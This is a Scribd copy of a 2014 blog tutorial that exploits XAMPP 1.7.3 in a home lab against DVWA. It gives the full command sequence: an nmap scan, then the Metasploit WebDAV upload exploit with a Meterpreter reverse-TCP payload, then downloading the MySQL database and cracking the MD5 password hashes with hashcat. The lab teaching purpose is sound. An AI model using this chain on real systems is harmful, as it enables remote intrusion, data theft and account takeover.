Scribd Logo
Upload

Welcome to Scribd!

  • XAMPP 1.7.3 Exploitation SupraFortix Blog PDF

    Uploaded by

    jangkrik32
    248 views9 pages
    The document summarizes how to exploit a vulnerability in XAMPP 1.7.3 to gain unauthorized access to a victim's system running that version of XAMPP. It involves using Metasploit to find and use an exploit against the XAMPP installation, which allows downloading the MySQL database containing user passwords hashed with MD5. The hashes are then cracked using Hashcat to recover the passwords and gain access to the administrator account.

    Original Description:

    Original Title

    XAMPP 1.7.3 Exploitation « SupraFortix Blog.pdf

    Copyright

    © © All Rights Reserved

    Available Formats

    PDF, TXT or read online from Scribd

    Did you find this document useful?

    Is this content inappropriate?

    Report this Document
    The document summarizes how to exploit a vulnerability in XAMPP 1.7.3 to gain unauthorized access to a victim's system running that version of XAMPP. It involves using Metasploit to find and use an exploit against the XAMPP installation, which allows downloading the MySQL database containing user passwords hashed with MD5. The hashes are then cracked using Hashcat to recover the passwords and gain access to the administrator account.

    Copyright:

    © All Rights Reserved
    Download as PDF, TXT or read online from Scribd
    Flag for inappropriate content
    248 views9 pages

    XAMPP 1.7.3 Exploitation SupraFortix Blog PDF

    Uploaded by

    jangkrik32
    The document summarizes how to exploit a vulnerability in XAMPP 1.7.3 to gain unauthorized access to a victim's system running that version of XAMPP. It involves using Metasploit to find and use an exploit against the XAMPP installation, which allows downloading the MySQL database containing user passwords hashed with MD5. The hashes are then cracked using Hashcat to recover the passwords and gain access to the administrator account.

    Copyright:

    © All Rights Reserved
    Download as PDF, TXT or read online from Scribd
    Flag for inappropriate content
    of 9

    XAMPP 1.7.

    3 Exploitation SupraFortix Blog

    1 of 9

    https://suprafortix.wordpress.com/2014/04/17/exploiting-xampp-v1-7-3/

    SupraFortix Blog
    "The Internet is becoming the town square for the global village of tomorrow."
    (https://suprafortix.wordpress.com/)

    Home

    (https://suprafortix.wordpress.com/)
    Hacking
    (https://suprafortix.wordpress.com
    Networking
    (https://suprafortix.wordpress.com
    Series
    (https://suprafortix.wordpress.com
    Development
    (https://suprafortix.wordp

    Extra Stuff

    /category

    /category

    /hacking/)

    /networking/)/series/)

    XAMPP 1.7.3 Exploitation


    (https://suprafortix.wordpress.com
    /2014/04/17/exploiting-xampp-v1-7-3/)

    POSTED ON APRIL 17, 2014


    (HTTPS://SUPRAFORTIX.WORDPRESS.COM/2014/04
    /17/EXPLOITING-XAMPP-V1-7-3/) UPDATED ON JULY 11, 2014
    (HTTPS://SUPRAFORTIX.WORDPRESS.COM/2014/04
    /17/EXPLOITING-XAMPP-V1-7-3/)
    In this post Im going to concentrate on exploiting an older version
    of XAMPP server as well as stealing usernames and passwords
    from MySQL database tables from a particular website (DVWA)
    using the XAMPP vulnerability. The hacking tools that are used in
    this example are Metasploit msfconsole with Meterpreter payload
    as well as HashCat hash cracking tool. The operating systems
    used are Windows XP SP3 (Firewall ON) for the victim and Kali
    Linux for the attacker.
    XAMPP SETUP
    On the victims machine, start all available server modules,
    Apache, MySQL, FileZilla, Mercury.

    /category

    /category

    Follow SupraFortix Blog

    /development/)

    Recent Posts
    Network Bandwidth
    Checker
    (https://suprafortix.wordpress.com
    /2015/11/29/networkbandwidth-checker/)
    NOVEMBER 29, 2015

    4000 Series Checkpoint


    Firewall RAM Upgrade
    (https://suprafortix.wordpress.com
    /2015/01/30/4000series-checkpointfirewall-ram-upgrade/)
    JANUARY 30, 2015

    Arch Linux as a
    Penetration
    Testing Platform
    (https://suprafortix.wordpress.com
    /2014/11/27/arch-linuxpenetration-testingplatform/)
    NOVEMBER 27, 2014

    Automatic Nmap Script


    (https://suprafortix.wordpress.com
    /2014/09
    /16/automatic_nmap_script/)
    SEPTEMBER 16, 2014

    Cisco 3750 IOS Update


    (https://suprafortix.wordpress.com
    /2014/08/05/3750ios-cisco-update/)
    (https://suprafortix. les.wordpress.com/2014/04/xampp-setuparr.png)
    SCANNING THE VICTIM

    AUGUST 5, 2014

    Other Sites

    Next step includes nding out what type of software the victim
    runs as we dont know that at the beginning of the hack. Open up
    terminal window in Kali and conduct a Version Nmap scan with the
    following piece of code. In this case 192.168.1.7 is the victims IP
    address.

    Follow

    Follow

    2/23/2016 3:11 PM

    XAMPP 1.7.3 Exploitation SupraFortix Blog

    2 of 9

    https://suprafortix.wordpress.com/2014/04/17/exploiting-xampp-v1-7-3/

    nmap -sV 192.168.1.7

    When the scan returns some data, we can see the victims server
    services that are running and the open ports they are
    communicating on. However its still not clear what type of the
    server it is. A quick Google search of these services will reveal that
    the victim is running XAMPP 1.7.3.

    (https://www.dropbox.com
    /sh/47hw5czeij8og71
    /AABBb_OyOczjEVOeETnG65D-a)
    (https://twitter.com
    /SupraFortix)

    (https://sourceforge.net
    /u/suprafortix/pro le/)

    Search

    (https://suprafortix. les.wordpress.com/2014/04/nmap-scan.png)
    Services Turned On
    Apache httpd 2.2.14
    DAV/2
    mod_ssl/2.2.14 OpenSSL/0.9.8l
    mod_autoindex_color PHP/5.3.1
    mod_apreq2-20090110/2.7.1
    mod_perl/2.0.4 Perl/v5.10.1

    XAMPP HACKING
    Open another terminal windows and re up msfconsole, and wait
    until it loads up and search for XAMPP vulnerabilities in Metasploit
    database.
    msfconsole starts msfconsole
    search xampp searches for XAMPP vulnerabilities

    (https://suprafortix. les.wordpress.com/2014/04/xamppsearch.png)
    An exploit shows up with a disclosure date of 14/01/2012. This is
    perfect as the release date of XAMPP 1.7.3 was 23/12/2009, so the

    Follow

    Follow

    2/23/2016 3:11 PM

    XAMPP 1.7.3 Exploitation SupraFortix Blog

    3 of 9

    https://suprafortix.wordpress.com/2014/04/17/exploiting-xampp-v1-7-3/

    vulnerability will still be exploitable.


    use exploit/windows/http/xampp_webdav_upload_php

    Now search and choose appropriate payload for this hack. In this
    example the payload will open a Meterpreter terminal session,
    which allows the attacker to view, download and modify les and
    directories of victims computer.
    show payloads shows all available payloads
    set payload php/meterpreter/reverse_tcp sets a particular

    payload

    (https://suprafortix. les.wordpress.com/2014/04/selectpayload.png)
    Now we need to look at the required options to set up to
    successfully execute the hack.
    show options shows required and non-required options to

    set up
    We can see that some required rows such as LHOST (local host
    attacker) and RHOST (remote host victim) are empty, other
    required options such as PATH and RPORT are already lled up by
    default.

    (https://suprafortix. les.wordpress.com/2014/04/show-optionsarr1.png)

    Follow

    Follow

    2/23/2016 3:11 PM

    XAMPP 1.7.3 Exploitation SupraFortix Blog

    4 of 9

    https://suprafortix.wordpress.com/2014/04/17/exploiting-xampp-v1-7-3/

    set rhost 192.168.1.7 sets the target address


    set lhost 192.168.1.9 sets the listen address

    The exploit and the payload now have all the necessary
    information to conduct the attack.
    exploit attempts to exploit the target IP address

    If the attack is successful, a Meterpreter command prompt will be


    displayed on screen.

    (https://suprafortix. les.wordpress.com/2014/04/meterpretercommand-prompt.png)
    If pwd (present working directory) command is executed you can
    see that the Meterpreter session has been opened in C:\xampp
    \webdav directory. The database les of the desired website are
    not located in this directory, therefore we need to search for it in
    the C:\xampp directory.
    cd .. moves to C:\xampp directory
    ls shows the content of C:\xampp directory

    (https://suprafortix. les.wordpress.com/2014/04/mysqlnd-arr.png)
    A directory named mysql is located in C:\xampp\, lets see whats
    inside.

    Follow

    Follow

    2/23/2016 3:11 PM

    XAMPP 1.7.3 Exploitation SupraFortix Blog

    5 of 9

    https://suprafortix.wordpress.com/2014/04/17/exploiting-xampp-v1-7-3/

    cd mysql moves to C:\xampp\mysql\


    cd data moves to C:\xampp\mysql\data\
    cd dvwa moves to C:\xampp\mysql\data\dvwa\
    ls shows the contents of C:\xampp\mysql\data\dvwa\

    I knew where the desired directory is located, youd ls every


    time you move into a new directory to view the content.
    The directory shows .MYD and .MYI le types, which are MySQL
    database les.

    (https://suprafortix. les.wordpress.com/2014/04/dvwa-dir.png)
    To download all database les, the session needs to move outside
    of dvwa directory into data directory where the whole database
    directory can be downloaded onto the attacker machine.
    cd .. moves to C:\xampp\mysql\data\
    download dvwa downloads the dvwa directory where the
    database les are hidden

    (https://suprafortix. les.wordpress.com/2014/04
    /downloading.png)
    A whole source-code of the website and other system les or
    directories can be downloaded, modi ed or deleted or even new
    les uploaded, however thats beyond the scope of this post.
    PASSWORD CRACKING
    The downloaded database directory will be located by default in
    \root\ directory on the attackers machine. Open up another
    terminal window and go to the downloaded database directory.
    The hashed passwords, usernames and le-paths to user pictures
    are located in the users.MYD
    cat users.MYD shows the contents on users.MYD le.

    Follow

    Follow

    2/23/2016 3:11 PM

    XAMPP 1.7.3 Exploitation SupraFortix Blog

    6 of 9

    https://suprafortix.wordpress.com/2014/04/17/exploiting-xampp-v1-7-3/

    (https://suprafortix. les.wordpress.com/2014/04/users-myd- learr.png)


    Extract the stolen hashes to a text le. And save the text le as
    stolenhashes.txt in the /root/ directory.

    (https://suprafortix. les.wordpress.com/2014/04
    /stolenhashes.png)
    The tool that is used to crack the hashes in this example is
    HashCat with a RockYou hash dictionary, located in
    \root\Desktop.
    hashcat -m 0 -a 0 /root/stolenhashes.txt /root/Desktop
    /rockyou.txt will attempt to nd given hashes in rockyou.txt

    dictionary.

    (https://suprafortix. les.wordpress.com/2014/04/crackedpasswords-arr.png)

    Follow

    Follow

    2/23/2016 3:11 PM

    XAMPP 1.7.3 Exploitation SupraFortix Blog

    7 of 9

    https://suprafortix.wordpress.com/2014/04/17/exploiting-xampp-v1-7-3/

    HashCat successfully cracked all of the hashes. The attacker now


    tries to login with the username and the corresponding cracked
    password.

    (https://suprafortix. les.wordpress.com/2014/04/dvwa-loginpage.png)
    SUCCESS!! The attacker now has a complete control over the
    administrator account.

    (https://suprafortix. les.wordpress.com/2014/04/dvwa-loginpage-in.png)

    You May Like


    ?

    1.
    20
    Fantastic Tropical Beaches to Visit 4
    Follow

    Follow

    2/23/2016 3:11 PM

    XAMPP 1.7.3 Exploitation SupraFortix Blog

    8 of 9

    https://suprafortix.wordpress.com/2014/04/17/exploiting-xampp-v1-7-3/

    Share this:

    Twitter (https://suprafortix.wordpress.com/2014/04/17/exploitingxampp-v1-7-3/?share=twitter&nb=1)

    Facebook (https://suprafortix.wordpress.com/2014/04
    /17/exploiting-xampp-v1-7-3/?share=facebook&nb=1)

    Google (https://suprafortix.wordpress.com/2014/04/17/exploitingxampp-v1-7-3/?share=google-plus-1&nb=1)

    Be the first to like this.

    Related

    Website Hacking
    Environment
    (https://supraforti
    /2014/03
    /23/websitehackingenvironment/)

    Hashcat Password
    Cracking
    (https://supraforti
    /2014/06
    /13/hashcatpasswordcraking/)

    Learning MySQL
    (Part II)
    (https://supraforti
    /2014/06
    /28/learningmysql-part-ii/)

    This entry was posted in Exploitation


    (https://suprafortix.wordpress.com/category/hacking/exploitation/)
    and tagged dvwa (https://suprafortix.wordpress.com/tag/dvwa/),
    exploit (https://suprafortix.wordpress.com/tag/exploit/),
    exploit/windows/http/xampp_webdav_upload_php
    (https://suprafortix.wordpress.com
    /tag/exploitwindowshttpxampp_webdav_upload_php/), hacking
    (https://suprafortix.wordpress.com/tag/hacking-2/), hash cracking
    (https://suprafortix.wordpress.com/tag/hash-cracking/), hashcat
    (https://suprafortix.wordpress.com/tag/hashcat/), metasploit
    (https://suprafortix.wordpress.com/tag/metasploit/), msfconsole
    (https://suprafortix.wordpress.com/tag/msfconsole/), unauthorised
    access (https://suprafortix.wordpress.com/tag/unauthorisedaccess/), webdav (https://suprafortix.wordpress.com/tag/webdav/),
    XAMPP 1.7.3 (https://suprafortix.wordpress.com/tag/xampp-1-7-3/).

    Firefox v28.0
    XSSVulnerability

    ACL Steganography

    Leave a Reply

    Follow

    Follow

    2/23/2016 3:11 PM

    XAMPP 1.7.3 Exploitation SupraFortix Blog

    9 of 9

    https://suprafortix.wordpress.com/2014/04/17/exploiting-xampp-v1-7-3/

    BLOG AT WORDPRESS.COM. (HTTPS://WORDPRESS.COM/?REF=FOOTER_BLOG) THEME: EVENTBRITE VENUE BY VOCE


    PLATFORMS (HTTP://VOCEPLATFORMS.COM/).
    WE TEAMED UP WITH EVENTBRITE (HTTP://EVENTBRITE.COM/L/WORDPRESS?REF=WPFOOTER)

    Follow

    Follow

    2/23/2016 3:11 PM

    You might also like